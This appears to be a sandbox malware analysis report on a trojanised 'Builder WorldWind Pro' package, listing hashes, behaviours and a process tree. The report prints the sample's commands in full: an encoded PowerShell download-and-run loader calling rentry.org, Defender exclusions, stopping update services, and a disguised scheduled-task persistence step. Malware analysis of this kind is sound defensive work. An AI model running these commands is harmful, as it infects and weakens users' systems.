Overview
overview
10Static
static
10Builder Wo...ro.exe
windows10-2004-x64
10Builder Wo...ip.dll
windows10-2004-x64
1Builder Wo...et.dll
windows10-2004-x64
1Builder Wo...gn.dll
windows10-2004-x64
1Builder Wo...ts.dll
windows10-2004-x64
1Builder Wo...rk.dll
windows10-2004-x64
1Builder Wo...il.dll
windows10-2004-x64
1Builder Wo...ub.exe
windows10-2004-x64
10Analysis
-
max time kernel
11s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
06/06/2023, 16:51
Behavioral task
behavioral1
Sample
Builder WorldWind Pro/Builder WorldWind Pro/Builder WorldWind Pro.exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral2
Sample
Builder WorldWind Pro/Builder WorldWind Pro/DotNetZip.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
Builder WorldWind Pro/Builder WorldWind Pro/Extreme.Net.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral4
Sample
Builder WorldWind Pro/Builder WorldWind Pro/MetroFramework.Design.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
Builder WorldWind Pro/Builder WorldWind Pro/MetroFramework.Fonts.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral6
Sample
Builder WorldWind Pro/Builder WorldWind Pro/MetroFramework.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
Builder WorldWind Pro/Builder WorldWind Pro/Mono.Cecil.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral8
Sample
Builder WorldWind Pro/Builder WorldWind Pro/stub.exe
Resource
win10v2004-20230220-en
General
-
Target
Builder WorldWind Pro/Builder WorldWind Pro/Builder WorldWind Pro.exe
-
Size
73KB
-
MD5
15b7bffd31462f0ca361a1c2b2211f86
-
SHA1
bdf831203ded29b82e4aa989f26fea441b6a20ba
-
SHA256
1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580
-
SHA512
c48fd5855527f2e2615b3614ad43c025fac85ef1538de2a52a6267e3e61be611b04854bbcad54111c56f3ce661159b94d1639414cb0ce0086f466163ed0d3153
-
SSDEEP
768:6o9jqvFupCbxbbcaqcCNXdca6Nt//cO3wmhrV2pL:V9mN7B33dw
Malware Config
Extracted
https://rentry.org/nipkv/raw
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1208 created 3156 1208 2vtehhlm.3e31.exe 55 PID 1208 created 3156 1208 2vtehhlm.3e31.exe 55 PID 1208 created 3156 1208 2vtehhlm.3e31.exe 55 PID 1208 created 3156 1208 2vtehhlm.3e31.exe 55 PID 1208 created 3156 1208 2vtehhlm.3e31.exe 55 -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 3516 powershell.exe 9 3516 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 2vtehhlm.3e31.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation Builder WorldWind Pro.exe -
Executes dropped EXE 3 IoCs
pid Process 4944 2vtehhlm.3e30.exe 1208 2vtehhlm.3e31.exe 5024 2vtehhlm.3e32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run 2vtehhlm.3e32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " 2vtehhlm.3e32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1208 set thread context of 2856 1208 2vtehhlm.3e31.exe 100 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1256 sc.exe 4480 sc.exe 844 sc.exe 2324 sc.exe 4908 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3516 powershell.exe 3516 powershell.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1224 powershell.exe 1224 powershell.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 1208 2vtehhlm.3e31.exe 2856 dialer.exe 2856 dialer.exe 4868 powershell.exe 4868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 3516 powershell.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 2856 dialer.exe Token: SeShutdownPrivilege 2336 powercfg.exe Token: SeCreatePagefilePrivilege 2336 powercfg.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeShutdownPrivilege 4116 powercfg.exe Token: SeCreatePagefilePrivilege 4116 powercfg.exe Token: SeShutdownPrivilege 668 powercfg.exe Token: SeCreatePagefilePrivilege 668 powercfg.exe Token: SeShutdownPrivilege 452 powercfg.exe Token: SeCreatePagefilePrivilege 452 powercfg.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1628 wrote to memory of 3516 1628 Builder WorldWind Pro.exe 83 PID 1628 wrote to memory of 3516 1628 Builder WorldWind Pro.exe 83 PID 3516 wrote to memory of 4944 3516 powershell.exe 85 PID 3516 wrote to memory of 4944 3516 powershell.exe 85 PID 3516 wrote to memory of 1208 3516 powershell.exe 86 PID 3516 wrote to memory of 1208 3516 powershell.exe 86 PID 3516 wrote to memory of 5024 3516 powershell.exe 87 PID 3516 wrote to memory of 5024 3516 powershell.exe 87 PID 2176 wrote to memory of 4480 2176 cmd.exe 93 PID 2176 wrote to memory of 4480 2176 cmd.exe 93 PID 2176 wrote to memory of 844 2176 cmd.exe 94 PID 2176 wrote to memory of 844 2176 cmd.exe 94 PID 2176 wrote to memory of 2324 2176 cmd.exe 95 PID 2176 wrote to memory of 2324 2176 cmd.exe 95 PID 2176 wrote to memory of 4908 2176 cmd.exe 96 PID 2176 wrote to memory of 4908 2176 cmd.exe 96 PID 2176 wrote to memory of 1256 2176 cmd.exe 97 PID 2176 wrote to memory of 1256 2176 cmd.exe 97 PID 1208 wrote to memory of 2856 1208 2vtehhlm.3e31.exe 100 PID 1016 wrote to memory of 2336 1016 cmd.exe 103 PID 1016 wrote to memory of 2336 1016 cmd.exe 103 PID 1016 wrote to memory of 4116 1016 cmd.exe 104 PID 1016 wrote to memory of 4116 1016 cmd.exe 104 PID 1016 wrote to memory of 668 1016 cmd.exe 105 PID 1016 wrote to memory of 668 1016 cmd.exe 105 PID 1016 wrote to memory of 452 1016 cmd.exe 106 PID 1016 wrote to memory of 452 1016 cmd.exe 106
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\Builder WorldWind Pro\Builder WorldWind Pro\Builder WorldWind Pro.exe"C:\Users\Admin\AppData\Local\Temp\Builder WorldWind Pro\Builder WorldWind Pro\Builder WorldWind Pro.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe"C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e30.exe"4⤵
- Executes dropped EXE
PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e31.exe"C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e31.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe"C:\Users\Admin\AppData\Local\Temp\2vtehhlm.3e32.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5024
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:844
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1256
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD52247453c28acd1eb75cfe181540458a8
SHA1851fc5a9950d422d76163fdc6a453d6859d56660
SHA256358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA51242475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
3.8MB
MD5d1529aa798dfc7fe269926f5594b467b
SHA199f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA5125d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41
-
Filesize
3.8MB
MD5d1529aa798dfc7fe269926f5594b467b
SHA199f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA5125d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41
-
Filesize
3.8MB
MD5d1529aa798dfc7fe269926f5594b467b
SHA199f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA5125d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41
-
Filesize
5.8MB
MD55f2f1ae240812065799e8c05d3a01aa7
SHA1e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50
-
Filesize
5.8MB
MD55f2f1ae240812065799e8c05d3a01aa7
SHA1e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50
-
Filesize
91KB
MD517d1a593f7481f4a8cf29fb322d6f472
SHA1a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA5128c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849
-
Filesize
91KB
MD517d1a593f7481f4a8cf29fb322d6f472
SHA1a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA5128c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849
-
Filesize
91KB
MD517d1a593f7481f4a8cf29fb322d6f472
SHA1a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA5128c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82